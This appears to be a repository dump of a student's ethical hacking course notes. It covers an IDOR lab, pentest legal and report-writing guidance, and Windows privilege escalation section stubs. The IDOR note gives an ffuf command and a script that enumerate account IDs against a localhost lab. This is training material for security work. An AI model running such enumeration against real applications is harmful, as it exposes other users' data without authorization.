**Result**: If vulnerable, the XML parser includes the file content in the output 40 | 41 | ![](.gitbook/assets/2025-02-28_13-29-38_929.png) 42 | 43 | --- 44 | 45 | -------------------------------------------------------------------------------- /peh/6-webapp/8-web-idor.md: -------------------------------------------------------------------------------- 1 | # Web App - IDOR 2 | 3 | > - [PayloadsAllTheThings - Insecure Direct Object References](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References) 4 | 5 | ➡️ **Insecure Direct Object Reference** (**IDOR**) occurs when an application exposes direct access to objects (e.g. database records, files, etc) without proper authorization, allowing attackers to manipulate or access unauthorized data. 6 | 7 | --- 8 | 9 | ## IDOR - Insecure Direct Object Reference 10 | 11 | - Try to change the `account` object ID in the URL to something else 12 | - `http://localhost/labs/e0x02.php?account=1009` 13 | - `http://localhost/labs/e0x02.php?account=1010` 14 | 15 | ![](.gitbook/assets/2025-02-28_13-35-42_930.png) 16 | 17 | - Enumerate all the accounts within the application 18 | 19 | ```bash 20 | cd $HOME/tcm/peh/webapp 21 | 22 | # Create IDs file from 1 to 1000 23 | python3 -c 'for i in range(1,2001): print(i)' > num.txt 24 | 25 | ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w num.txt -fs 849 26 | ``` 27 | 28 | ```bash 29 | # Valid accounts 30 | 1000 31 | 1001 32 | 1002 33 | 1004 34 | 1006 35 | 1005 36 | 1009 37 | 1007 38 | 1010 39 | 1008 40 | 1016 41 | 1012 42 | 1014 43 | 1019 44 | 1011 45 | 1017 46 | 1015 47 | 1013 48 | 1018 49 | 1003 50 | ``` 51 | 52 | --- 53 | 54 | -------------------------------------------------------------------------------- /peh/6-webapp/README.md: -------------------------------------------------------------------------------- 1 | # 6. Web Application 2 | 3 | --- 4 | 5 | ## Sections 6 | 7 | 1. [Web App Lab Setup](1-web-lab.md) 8 | 2. [Web App - SQL Injection](2-web-sqli.md) 9 | 3. [Web App - XSS](3-web-xss.md) 10 | 4. [Web App - Command Injection](4-web-cmd-injection.md) 11 | 5. [Web App - Insecure File Upload](5-web-file-upload.md) 12 | 6. [Web App - Authentication Attacks](6-web-auth-attacks.md) 13 | 7. [Web App - XXE](7-web-xxe.md) 14 | 8. [Web App - IDOR](8-web-idor.md) 15 | 9. [Web App - Capstone Practical Lab](9-web-capstone-lab.md) 16 | 17 | --- 18 | 19 | -------------------------------------------------------------------------------- /peh/7-wireless/.gitbook/assets/2025-02-21_08-33-58_895.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/7-wireless/.gitbook/assets/2025-02-21_08-33-58_895.png -------------------------------------------------------------------------------- /peh/7-wireless/.gitbook/assets/2025-02-21_08-39-18_896.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/7-wireless/.gitbook/assets/2025-02-21_08-39-18_896.png -------------------------------------------------------------------------------- /peh/7-wireless/.gitbook/assets/image-20250221082555755.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/7-wireless/.gitbook/assets/image-20250221082555755.png -------------------------------------------------------------------------------- /peh/8-report/README.md: -------------------------------------------------------------------------------- 1 | # 8. Legal Documentation & Report Writing 2 | 3 | ## Common legal documents 4 | 5 | ➡️ **Sales phase** 6 | 7 | Before conducting a penetration test, legal agreements are established to define the relationship between the client and the security testing provider. 8 | 9 | - **Mutual Non-Disclosure Agreement (NDA)** 10 | - Ensures confidentiality of sensitive information. 11 | - Prevents disclosure of client or tester details without consent. 12 | - **Master Service Agreement (MSA)** 13 | - Defines overall business terms and conditions. 14 | - Covers liability, payment terms, and service responsibilities. 15 | - **Statement of Work (SOW)** 16 | - Specifies the scope, objectives, and timeline of the penetration test. 17 | - Outlines deliverables, methodologies, and exclusions. 18 | - **Other Documents (sample reports, recommendation letters, etc.)** 19 | - Provides clients with example reports for reference. 20 | - Includes references or testimonials for credibility. 21 | 22 | ➡️ **Before you test** 23 | 24 | Key agreements set the rules and expectations for how the penetration test will be conducted. 25 | 26 | - **Rules of Engagement (ROE)** 27 | - Defines **testing scope**, authorized attack methods, and limitations. 28 | - Establishes **acceptable testing hours**, emergency contacts, and data handling rules. 29 | - Ensures compliance with **legal and ethical guidelines** to avoid unintended damage. 30 | 31 | ➡️ **After you test** 32 | 33 | Once the penetration test is completed, findings and recommendations are documented. 34 | 35 | - **Findings report** 36 | - Summarizes identified vulnerabilities and security gaps. 37 | - Provides **risk assessments** and prioritization of discovered threats. 38 | - Includes **remediation recommendations** to improve security. 39 | 40 | These documents ensure **legal protection, clear expectations, and structured reporting** throughout the penetration testing lifecycle. 41 | 42 | --- 43 | 44 | ## Pentest report writing 45 | 46 | > - Check TCM's video about [Writing a Pentest Report](https://www.youtube.com/watch?v=EOoBAq6z4Zk) with the [provided samples](https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report) 47 | 48 | **Demo Company - Security Assessment Findings Report** 49 | 50 | - **Clear & Structured:** Well-organized with sections like Executive Summary, Findings, and Recommendations for easy navigation. 51 | - **Professional & Concise:** Uses **formal language**, **bullet points**, and **tables** to present key information efficiently. 52 | - **Balanced Detail:** Combines **technical depth for IT teams** with **simplified summaries for executives**. 53 | - **Actionable Insights:** Findings are **supported with evidence**, and recommendations are **clear, prioritized, and practical**. 54 | 55 | The report is **well-written, easy to follow, and effective** for both **technical and non-technical audiences**. 56 | 57 | --- 58 | 59 | ## Career advice from TCM 60 | 61 | 1. **Set goals** for yourself and stay motivated. 62 | 2. **Avoid complacency** - keep pushing forward. 63 | 3. **Apply for jobs even if you're unqualified** - growth comes from challenges. 64 | 4. **Admit when you don’t know something** - learning starts with humility. 65 | 5. **Prove yourself** by showing dedication and effort. 66 | 6. **Be selective with job applications** - apply only to roles that fit your long-term goals and criteria. 67 | 7. **Surround yourself with smarter people** - growth comes from being challenged. 68 | 8. **Build a strong network** - connections are key to success. 69 | 70 | --- 71 | 72 | -------------------------------------------------------------------------------- /peh/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Practical Ethical Hacking - The Complete Course by Heath Adams 3 | --- 4 | 5 | # TCM - Practical Ethical Hacking 6 | 7 | ![Practical Ethical Hacking - academy.tcm-sec.com - © TCM Security](.gitbook/assets/peh.png) 8 | 9 | ## [PEH](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course) Course Goals and Objectives 10 | 11 | * Learn the practical ethical hacking 12 | * Internal and external network penetration testing 13 | * Wireless Pentesting 14 | * Web App Pentesting 15 | * Study for the **PNPT** Certification 16 | 17 | ## Course duration & Topics 18 | 19 | ~ 25 hours 20 | 21 | 1. [Introduction & Networking](1-intro/README.md) 22 | 2. [Lab Set Up, Linux & Python](2-lab/README.md) 23 | 3. [The Ethical Hacker Methodology](3-eth-hack/README.md) 24 | 5. [Active Directory](4-active-directory/README.md) 25 | 6. [Post Exploitation](5-post-exploitation/README.md) 26 | 7. [Web Application](6-webapp/README.md) 27 | 8. [Wireless Attacks](7-wireless/README.md) 28 | 9. [Legal Documentation & Report Writing](8-report/README.md) 29 | 30 | Instructor: [Heath Adams - The Cyber Mentor](https://www.thecybermentor.com/) 31 | 32 | ## Useful links and resources 33 | 34 | * Where to find the [Practical Ethical Hacking - The Complete Course](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course) course? - [TCM Academy Courses](https://academy.tcm-sec.com/courses) 35 | * TCM discord channel - [TCM Security Discord](https://discord.gg/tcm) 36 | * **Practical Network Penetration Tester** Certification - [PNPT](https://certifications.tcm-sec.com/pnpt/) 37 | * 🔬 For the **training** part I will use my home lab environment 38 | * [My PEH references](peh-references.md) 39 | 40 | > ### ❗ Disclaimer 41 | > 42 | > * **Do not use the covered attacks and techniques on real IP addresses, hosts or networks without proper authorization!** 43 | 44 | --- 45 | 46 | -------------------------------------------------------------------------------- /wpe/.gitbook/assets/wpe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/wpe/.gitbook/assets/wpe.png -------------------------------------------------------------------------------- /wpe/1-intro/README.md: -------------------------------------------------------------------------------- 1 | # 1. Introduction to Windows Privesc 2 | 3 | ## Gaining a foothold 4 | 5 | 6 | 7 | ## Initial enumeration 8 | 9 | 10 | 11 | ## Exploring automated tools -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/1-wpe-kernelexploits.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: Kernel Exploits -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/10-wpe-cve-2019-1388.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: CVE-2019-1388 -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/11-wpe-capstone.md: -------------------------------------------------------------------------------- 1 | # WPE Capstone Challenge -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/2-wpe-pws-portfwd.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: Passwords and Port Forwarding 2 | 3 | -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/3-wpe-wsl.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: Windows Subsystem for Linux -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/4-wpe-system-runas.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: getsystem, RunAs -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/5-wpe-registry.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: Registry -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/6-wpe-exes.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: Executable Files -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/7-wpe-startupapps.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: Startup Applications -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/8-wpe-dll-hijacking.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: DLL Hijacking -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/9-wpe-permissions.md: -------------------------------------------------------------------------------- 1 | # Escalation Path: Service Permissions (Paths) -------------------------------------------------------------------------------- /wpe/2-win-privesc-paths/README.md: -------------------------------------------------------------------------------- 1 | # 2. Windows Privilege Escalation Paths 2 | 3 | --- 4 | 5 | ## Sections 6 | 7 | 1. [Escalation Path: Kernel Exploits](1-wpe-kernelexploits.md) 8 | 2. [Escalation Path: Passwords and Port Forwarding](2-wpe-pws-portfwd.md) 9 | 3. [Escalation Path: Windows Subsystem for Linux](3-wpe-wsl.md) 10 | 4. [Escalation Path: getsystem, RunAs](4-wpe-system-runas.md) 11 | 5. [Escalation Path: Registry](5-wpe-registry.md) 12 | 6. [Escalation Path: Executable Files](6-wpe-exes.md) 13 | 7. [Escalation Path: Startup Applications](7-wpe-startupapps.md) 14 | 8. [Escalation Path: DLL Hijacking](8-wpe-dll-hijacking.md) 15 | 9. [Escalation Path: Service Permissions (Paths)](9-wpe-permissions.md) 16 | 10. [Escalation Path: CVE-2019-1388](10-wpe-cve-2019-1388.md) 17 | 11. [Capstone Challenge](11-wpe-capstone.md) 18 | 19 | --- 20 | 21 | -------------------------------------------------------------------------------- /wpe/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Windows Privesc for Beginners by Heath Adams 3 | --- 4 | 5 | # TCM - Windows Privilege Escalation for Beginners 6 | 7 | ![Windows Privilege Escalation for Beginners - academy.tcm-sec.com - © TCM Security](.gitbook/assets/wpe.png) 8 | 9 | ## [WPE](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) Course Goals and Objectives 10 | 11 | * Learn Windows Privilege escalation techniques 12 | 13 | ## Course duration & Topics 14 | 15 | ~ 7 hours 16 | 17 | 1. [Introduction to Windows Privesc](1-intro/README.md) 18 | 1. [Windows Privilege Escalation Paths](2-win-privesc-paths/README.md) 19 | 20 | Instructor: [Heath Adams - The Cyber Mentor](https://www.thecybermentor.com/) 21 | 22 | ## Useful links and resources 23 | 24 | * 🚩 ***RETIRED COURSE*** - Where to find the [Windows Privilege Escalation for Beginners | TCM Security, Inc.](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) course? - [TCM Academy Courses](https://academy.tcm-sec.com/courses) 25 | * TCM discord channel - [TCM Security Discord](https://discord.gg/tcm) 26 | * **Practical Network Penetration Tester** Certification - [PNPT](https://certifications.tcm-sec.com/pnpt/) 27 | * 🔬 For the **training** part I will use my home lab environment, TryHackMe and HackTheBox environments 28 | * [My WPE references](wpe-references.md) 29 | 30 | > ### ❗ Disclaimer 31 | > 32 | > * **Do not use the covered attacks and techniques on real IP addresses, hosts or networks without proper authorization!** 33 | 34 | --- 35 | 36 | --------------------------------------------------------------------------------